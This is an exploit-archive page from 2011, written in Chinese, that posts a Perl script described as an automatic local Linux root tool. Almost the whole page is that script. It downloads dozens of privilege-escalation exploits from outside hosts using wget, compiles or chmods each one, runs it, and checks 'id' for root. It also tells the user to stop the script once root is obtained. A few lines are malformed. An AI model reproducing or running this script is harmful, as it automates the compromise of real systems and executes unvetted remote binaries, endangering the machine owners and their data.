linux本地自动溢出root权限
| EKU-ID: 121 | CVE: | OSVDB-ID: |
| Author: Evil0Day | Published: 2011-04-30 | Verified:
 |
| Download: | ||
Rating★★★☆☆ |
| EKU-ID: 121 | CVE: | OSVDB-ID: |
| Author: Evil0Day | Published: 2011-04-30 | Verified:
|
| Download: | ||
Rating★★★☆☆ |
http://hi.baidu.com/%C2%ED%BF%A5%B8%E7%B8%E7%BA%C3%CB%A7/blog/item/228ec72690f5ba419822ed21.html
转载自 Evil0Day
最终编辑 Evil0Day
/**************************************************************************************************************************************#!/usr/bin/perl
# 本地自动溢出获取root权限工具
# 如果大牛们的精力多搜集多了,也给我一份小弟
# mail:0day@sinhack.com
# blog:http://hi.baidu.com/evil0day
{
system("wget http://www.exploit-db.com/download/15944;mv 15944 15944.c");
system("gcc -w 15944.c -o 15944");
system("sudo setcap cap_sys_admin+ep 15944");
system("chmod 777 15944");
system("./15944");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/iskorpitx");
system("chmod 777 iskorpitx");
system("./iskorpitx");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/44");
system("chmod 777 44");
system("./44");
system("id");
system("wget http://plasteryapidekorasyon.com/yavuz/tool/exp1");
system("chmod 777 exp1");
system("./exp1");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/exp2");
system("chmod 777 exp2");
system("./exp2");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/exp3");
system("chmod 777 exp3");
system("./exp3");
system("id");
system("wget http://plasteryapidekorasyon.com/yavuz/tool/run2");
system("chmod 777 run2");
system("./run2");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/2009-proto_ops.tgz");
system("tar zxf 2009-proto_ops.tgz");
system("chmod 777 run.sh");
system("./run.sh");
system("./chmod 777 exploit");
system("./chmod 777 run");
system("./exploit");
system("./run");
system("id");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/15200");
system("chmod 777 15200");
system("./15200");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/15201");
system("chmod 777 15201");
system("./15201");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/15285.c");
system("gcc 15285.c -o 15285");
system("chmod 777 15285");
system("./15285");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/15");
system("chmod 777 15");
system("./15");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://plasteryapidekorasyon.com/yavuz/tool/27");
system("chmod 777 27");
system("./27");
system("id");
system("wget http://plasteryapidekorasyon.com/yavuz/tool/27-1");
system("chmod 777 27-1");
system("./27-1");
system("id");
system("wget http://plasteryapidekorasyon.com/yavuz/tool/28");
system("chmod 777 28");
system("./28");
system("id");
system("http://plasteryapidekorasyon.com/yavuz/tool/15150");
system("chmod 777 15150");
system("./15150 0xc0102290 64");
system("id");
system("wget http://plasteryapidekorasyon.com/yavuz/tool/siy1");
system("chmod 777 siy1");
system("./siy1");
system("id");
system("wget http://plasteryapidekorasyon.com/yavuz/tool/siy");
system("chmod 777 siy");
system("./siy");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_kdesud.c");
system("gcc hoagie_kdesud.c -o hoagie_kdesud");
system("chmod 777 hoagie_kdesud");
system("./hoagie_kdesud");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_restore.c");
system("gcc hoagie_restore.c -o hoagie_restore");
system("chmod 777 hoagie_restore");
system("./hoagie_restore");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_ntping.c");
system("gcc hoagie_ntping.c -o hoagie_ntping");
system("chmod 777 hoagie_ntping");
system("./hoagie_ntping");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_exim.c");
system("gcc hoagie_exim.c -o hoagie_exim");
system("chmod 777 hoagie_exim");
system("./hoagie_exim");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_solarisldap.c");
system("gcc hoagie_solarisldap.c -o hoagie_solarisldap");
system("chmod 777 hoagie_solarisldap");
system("./hoagie_solarisldap");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_solaris_siocgtunparam.c");
system("gcc hoagie_solaris_siocgtunparam.c -o hoagie_solaris_siocgtunparam");
system("chmod 777 hoagie_solaris_siocgtunparam");
system("./hoagie_solaris_siocgtunparam");
system("id");
print "如果是root 请按 ctrl+c 来停止\n";
system("wget http://www.void.at/exploits/hoagie_udp_sendmsg.c");
system("gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg");
system("chmod 777 hoagie_udp_sendmsg");
system("./hoagie_udp_sendmsg");
system("id");
}
**************************************************************************************************************************************/